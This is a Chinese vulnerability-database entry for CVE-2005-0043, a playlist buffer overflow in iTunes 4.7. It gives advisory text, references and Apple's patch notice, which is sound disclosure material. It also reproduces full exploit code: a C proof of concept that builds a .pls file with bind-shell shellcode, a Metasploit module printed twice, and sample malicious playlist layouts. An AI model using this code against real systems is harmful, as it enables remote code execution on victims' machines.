CVE-2005-0043
CVSS7.5
发布时间 :2005-05-02 00:00:00
修订时间 :2017-07-10 21:32:04
NMCOEPS    

[原文]Buffer overflow in Apple iTunes 4.7 allows remote attackers to execute arbitrary code via a long URL in (1) .m3u or (2) .pls playlist files.


[CNNVD]Apple iTunes m3u/pls播放列表远程缓冲区溢出漏洞(CNNVD-200505-661)

        Apple iTunes是一款媒体播放程序。
        Apple iTunes处理m3u或者pls播放列表文件时存在问题,远程攻击者可以利用这个漏洞以进程权限在系统上执行任意指令。
        如果构建恶意m3u或pls播放列表文件,当被iTunes装载时,会触发缓冲区溢出或执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0043
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0043
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-661
(官方数据源) CNNVD

- 其它链接及资源

http://lists.apple.com/archives/security-announce/2005/Jan/msg00000.html
(PATCH)  APPLE  APPLE-SA-2005-01-11
http://securitytracker.com/id?1012839
(UNKNOWN)  SECTRACK  1012839
http://www.idefense.com/application/poi/display?id=180&type=vulnerabilities
(PATCH)  IDEFENSE  20050113 Apple iTunes Playlist Parsing Buffer Overflow Vulnerability
http://www.kb.cert.org/vuls/id/377368
(VENDOR_ADVISORY)  CERT-VN  VU#377368
http://www.securityfocus.com/bid/12238
(UNKNOWN)  BID  12238
https://exchange.xforce.ibmcloud.com/vulnerabilities/18851
(UNKNOWN)  XF  itunes-m3u-pls-bo(18851)

- 漏洞信息

Apple iTunes m3u/pls播放列表远程缓冲区溢出漏洞
高危 缓冲区溢出
2005-05-02 00:00:00 2005-10-20 00:00:00
远程  
        Apple iTunes是一款媒体播放程序。
        Apple iTunes处理m3u或者pls播放列表文件时存在问题,远程攻击者可以利用这个漏洞以进程权限在系统上执行任意指令。
        如果构建恶意m3u或pls播放列表文件,当被iTunes装载时,会触发缓冲区溢出或执行任意指令。
        

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://www.apple.com/itunes/download/

- 漏洞信息 (758)

Apple iTunes Playlist Local Parsing Buffer Overflow Exploit (EDBID:758)
osX remote
2005-01-16 Verified
0 nemo
N/A [点击下载]
/*
 * PoC for iTunes on OS X 10.3.7
 * -( nemo@felinemenace.org )-
 *
 * Generates a .pls file, when loaded in iTunes it
 * binds a shell to port 4444.
 * Shellcode contains no \x00 or \x0a's.
 *
 * sample output:
 *
 * -[nemo@gir:~]$ ./fm-eyetewnz foo.pls
 * -( fm-eyetewnz )-
 * -( nemo@felinemenace.org )-
 * Creating file: foo.pls.
 * Bindshell on port: 4444
 * -[nemo@gir:~]$ open foo.pls
 * -[nemo@gir:~]$ nc localhost 4444
 * id
 * uid=501(nemo) gid=501(nemo) groups=501(nemo)
 *
 * Thanks to andrewg, mercy and core.
 * Greetings to pulltheplug and felinemenace.
 *
 * -( need a challenge? )-
 * -( http://pulltheplug.org )-
 */

#include <stdio.h>
#include <strings.h>

#define BUFSIZE 1598 + 4

char shellcode[] = /* large ugly shellcode generated by http://metasploit.com */
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7f\xe8\x02\xa6\x3b\xff\x07\xfa"
"\x38\xa5\xf8\x4a\x3c\xc0\xee\x83\x60\xc6\xb7\xfb\x38\x85\x07\xee"
"\x7c\x89\x03\xa6\x80\x9f\xf8\x4a\x7c\x84\x32\x78\x90\x9f\xf8\x4a"
"\x7c\x05\xf8\xac\x7c\xff\x04\xac\x7c\x05\xff\xac\x3b\xc5\x07\xba"
"\x7f\xff\xf2\x15\x42\x20\xff\xe0\x4c\xff\x01\x2c\xd6\xe3\xb7\xf9"
"\xd6\x03\xb7\xfa\xd6\x23\xb7\xfd\xd6\x83\xb7\x9a\xaa\x83\xb7\xf9"
"\x92\x83\xb5\x83\x92\xfd\xac\x83\xa6\x83\xb7\xf6\xee\x81\xa6\xa7"
"\xee\x83\xb7\xfb\x92\x0b\xb5\x5d\xd6\x23\xb7\xeb\xd6\x83\xb7\x93"
"\x91\x40\x44\x83\xaa\x83\xb7\xf9\x92\x83\xb5\x83\xd6\x83\xb7\x91"
"\x91\x40\x44\x83\xaa\x83\xb7\xf9\x92\x83\xb5\x83\x91\x40\x44\x83"
"\xd6\x83\xb7\xe5\xd6\x03\xb7\xeb\x7e\x02\x48\x13\xd6\x22\x48\x13"
"\xd6\x02\x48\x0b\xaa\x83\xb7\xf9\x92\x83\xb5\x83\x92\xfd\xac\x83"
"\xd6\x23\xb7\xf9\xd6\x83\xb7\xa1\x91\x40\x44\x83\x92\x27\x9c\x83"
"\xaa\x83\xb7\xf9\x92\x83\xb5\x83\xd6\x26\x48\x04\xc2\x86\x48\x04"
"\xae\x01\x48\x1e\xd6\x83\xb7\xb9\xaa\x83\xb7\xf9\x92\x83\xb5\x83"
"\x92\x26\x9d\x82\xae\x01\x48\x06\x92\xeb\xb5\x5d\xd6\xe0\xb7\xd3"
"\x7e\xe2\x48\x03\x7e\x22\x48\x07\xd6\x02\x48\x03\xd6\x83\xb7\xc0"
"\x92\x83\xb3\x57\xaa\x83\xb7\xf9\x92\x83\xb5\x83\x91\x63\xb7\xf3"
"\xc1\xe1\xde\x95\xc1\xe0\xc4\x93\xee\x83\xb7\xfb";

int main(int ac, char **av)
{
        int n,*p;
        unsigned char * q;
        char buf[BUFSIZE];
        FILE *pls;
        int offset=0x3DA8;
        char playlist[] = {
                "[playlist]\n"
                "NumberOfEntries=1\n"
                "File1=http://"
        };
        printf("-( fm-eyetewnz )-\n");
        printf("-( nemo@felinemenace.org )-\n");
        memset(buf,'\x60',BUFSIZE);
        bcopy(shellcode, buf + (BUFSIZE - 44 - sizeof(shellcode)),sizeof(shellcode) - 1); // avoid mangled stack.
        q = buf + sizeof(buf) - 5;
        p = (int *)q;
        if(!(av[1])) {
                printf("usage: %s <filename (.pls)> [offset]\n",*av);
                exit(1);
        }
        if(av[2])
                offset = atoi(av[2]);
        *p = (0xc0000000 - offset);// 0xbfffc258;
        if(!(pls = fopen(*(av+1),"w+"))) {
                printf("error opening file: %s.\n", *(av +1));
                exit(1);
        }
        printf("Creating file: %s.\n",*(av+1));
        printf("Bindshell on port: 4444\n");
        fwrite(playlist,sizeof(playlist) - 1,1,pls);
        fwrite(buf,sizeof(buf) - 1,1,pls);
        fclose(pls);
}

// milw0rm.com [2005-01-16]
		

- 漏洞信息 (16562)

Apple ITunes 4.7 Playlist Buffer Overflow (EDBID:16562)
windows local
2010-05-09 Verified
0 metasploit
N/A [点击下载]
##
# $Id: apple_itunes_playlist.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Apple ITunes 4.7 Playlist Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Apple ITunes 4.7
				build 4.7.0.42. By creating a URL link to a malicious PLS
				file, a remote attacker could overflow a buffer and execute
				arbitrary code. When using this module, be sure to set the
				URIPATH with an extension of '.pls'.
			},
			'License'        => MSF_LICENSE,
			'Author'         => 'MC',
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2005-0043' ],
					[ 'OSVDB', '12833' ],
					[ 'BID', '12238' ],
				],

			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},

			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
					'StackAdjustment' => -3500,
				},
			'Platform' => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 Pro English SP4',	{ 'Ret' => 0x75033083 } ],
					[ 'Windows XP Pro English SP2',		{ 'Ret' => 0x77dc2063 } ],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Jan 11 2005',
			'DefaultTarget'  => 0))
	end

	def on_request_uri(cli, request)
		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		cruft   = rand(9).to_s

		sploit =  make_nops(2545) + payload.encoded + [target.ret].pack('V')

		# Build the HTML content
		content =  "[playlist]\r\n" + "NumberOfEntries=#{cruft}\r\n"
		content << "File#{cruft}=http://#{sploit}"

		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content, { 'Content-Type' => 'text/html' })

		# Handle the payload
		handler(cli)
	end

end
		

- 漏洞信息 (F83127)

Apple ITunes 4.7 Playlist Buffer Overflow (PacketStormID:F83127)
2009-11-26 00:00:00
MC  metasploit.com
exploit,remote,overflow,arbitrary
apple
CVE-2005-0043
[点击下载]

This Metasploit module exploits a stack overflow in Apple ITunes 4.7 build 4.7.0.42. By creating a URL link to a malicious PLS file, a remote attacker could overflow a buffer and execute arbitrary code. When using this module, be sure to set the URIPATH with an extension of '.pls'.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Apple ITunes 4.7 Playlist Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in Apple ITunes 4.7
				build 4.7.0.42. By creating a URL link to a malicious PLS
				file, a remote attacker could overflow a buffer and execute
				arbitrary code. When using this module, be sure to set the 
				URIPATH with an extension of '.pls'.
			},
			'License'        => MSF_LICENSE,
			'Author'         => 'MC', 
			'Version'        => '$Revision$',
			'References'     => 
				[
					[ 'CVE', '2005-0043' ],
					[ 'OSVDB', '12833' ],
					[ 'BID', '12238' ],
				],

			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},

			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
					'StackAdjustment' => -3500,
				},
			'Platform' => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 Pro English SP4',	{ 'Ret' => 0x75033083 } ],
					[ 'Windows XP Pro English SP2',		{ 'Ret' => 0x77dc2063 } ],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Jan 11 2005',
			'DefaultTarget'  => 0))
	end

	def on_request_uri(cli, request)
		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		cruft   = rand(9).to_s
		
		sploit =  make_nops(2545) + payload.encoded + [target.ret].pack('V') 

		# Build the HTML content
		content =  "[playlist]\r\n" + "NumberOfEntries=#{cruft}\r\n" 
		content << "File#{cruft}=http://#{sploit}"

		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content, { 'Content-Type' => 'text/html' })
		
		# Handle the payload
		handler(cli)		
	end

end
    

- 漏洞信息 (F35698)

Apple Security Advisory 2005-01-11 (PacketStormID:F35698)
2005-01-12 00:00:00
Apple,Sean de Regge  apple.com
advisory,overflow,arbitrary
CVE-2005-0043
[点击下载]

iTunes 4.7.1 fixes a buffer overflow in the parsing of m3u and pls playlist files that could allow earlier versions of iTunes to crash and execute arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

APPLE-SA-2005-01-11 iTunes 4.7.1

iTunes 4.7.1 is now available and delivers the following security
enhancement:

CVE-ID:  CAN-2005-0043

Impact:  Malicious playlists can cause iTunes to crash and could
execute arbitrary code

Description:  iTunes supports several common playlist formats.
iTunes 4.7.1 fixes a buffer overflow in the parsing of m3u and pls
playlist files that could allow earlier versions of iTunes to crash
and execute arbitrary code.  Credit to Sean de Regge
(seanderegge[at]hotmail.com) for discovering this issue, and to
iDEFENSE Labs for reporting it to us.

Available for:  Mac OS X, Microsoft Windows XP, Microsoft Windows
2000

iTunes 4.7.1 may be obtained from the Software Update pane in System
Preferences, or Apple's iTunes download site:
http://www.apple.com/itunes/download/

The download file is named: "iTunes4.7.1.dmg"
Its SHA-1 digest is:  2ae8c815f18756c24dfbc1ac7d837b75b828b92a

Information will also be posted to the Apple Product Security
web site:
http://docs.info.apple.com/article.html?artnum=61798

This message is signed with Apple's Product Security PGP key,
and details are available at:
http://www.apple.com/support/security/security_pgp.html

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1

iQEVAwUBQeQviJyw5owIz4TQAQIMrgf/fYmI5LZy5DM5a61kbXgnzq5OpQQPaidH
disRa8UbjGrr+sSvEytQaxgO5vbDsZWgDGYeeaHTUeyiBdznO/b7X9moUC0uXEtC
/a/CC2219AYeoQLJCMWhiIbrkL3OQ8QHoV3KaMlcg98tHgsrZKg1ssqEZszkjNrV
Jj1dm3hYn2/DHPqzhGy2+l4Lp/8Bdg2VwXJjCLrqD6cgcSAX0HVdVq+CM2VQ1DGH
O9PjkspNxoTR2iV0VbJdc+q/Mi1HXlouNaURgR01oBYGqZoQ2mxYGMLIthgVoyri
E/c5iyPq4lwDnhyjii4fajLO/3BW6MY7RVoNWv2ipYjVi1RPQ6d6iQ==
=SryY
-----END PGP SIGNATURE-----

-- 
David Mirza Ahmad
Symantec 

PGP: 0x26005712
8D 9A B1 33 82 3D B3 D0 40 EB  AB F0 1E 67 C6 1A 26 00 57 12
    

- 漏洞信息

12833
Apple iTunes m3u/pls Playlist Overflow
Local Access Required Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public

- 漏洞描述

A local overflow exists in iTunes. iTunes fails to perform proper bounds checking on m3u/pls playlists, which may result in a buffer overflow. A remote attacker can create a specially crafted m3u/pls playlist which when executed by a local user can cause a buffer overflow resulting in a loss of integrity and/or availability.

- 时间线

2005-01-11 Unknow
2005-01-15 Unknow

- 解决方案

Upgrade to version 4.7.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Apple ITunes Playlist Buffer Overflow Vulnerability
Boundary Condition Error 12238
Yes No
2005-01-11 12:00:00 2009-07-12 09:27:00
Discovery is credited to Sean de Regge.

- 受影响的程序版本

Apple iTunes 4.7
Apple iTunes 4.6
Apple iTunes 4.5
Apple iTunes 4.2 .72
Apple iTunes 4.7.1

- 不受影响的程序版本

Apple iTunes 4.7.1

- 漏洞讨论

Apple iTunes is prone to a buffer overflow vulnerability. This issue is exposed when the application parses 'm3u' and 'pls' playlist files. As these files may originate from an external source, this issue is considered remotely exploitable.

If the vulnerability is successfully exploited, it will result in execution of arbitrary code in the context of the user running the application.

- 漏洞利用

The following examples are available:
An example malicious .pls file with a long URL:

[playlist]
NumberOfEntries=1
File1=http://[A x 3045]1234

An example malicious .m3u file with a long URL:

http://[A x 3045]1234

The exploit 'fm-eyetewnz.c' has been released to the public by nemo &lt;nemo@felinemenace.org&gt;:

An additional exploit 'atmaca.c' has been released by atmaca &lt;atmaca@icqmail.com&gt;:

- 解决方案

Apple has released iTunes 4.7 to address this vulnerability. Mac OS X users may automatically apply this update through the Software Update pane in System Preferences.

Manual updates for Mac OS X and Windows are also available through the iTunes download page.


Apple iTunes 4.2 .72

Apple iTunes 4.5

Apple iTunes 4.6

Apple iTunes 4.7

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站